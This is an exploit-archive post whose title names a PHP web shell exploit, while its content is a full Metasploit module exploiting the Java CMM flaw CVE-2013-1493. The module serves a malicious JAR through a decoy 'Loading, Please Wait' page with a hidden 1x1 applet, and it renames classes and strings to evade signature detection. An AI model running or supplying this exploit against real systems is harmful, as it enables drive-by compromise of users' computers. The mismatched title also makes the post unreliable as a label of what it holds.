STUNSHELL PHP Web Shell Remote Code Execution

Posted on 2013-4-4 17:31:17
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
        This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',     # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Load the precompiled applet classes shipped with the framework and
  # randomise the name of the entry class so it does not match a fixed signature.
  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class")
    @init_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class")
    @leak_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class")
    @buffered_image_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class")
    @color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)
    super
  end

  # Serve the JAR for *.jar requests, the applet page for the resource root,
  # and redirect anything else to the root.
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end

end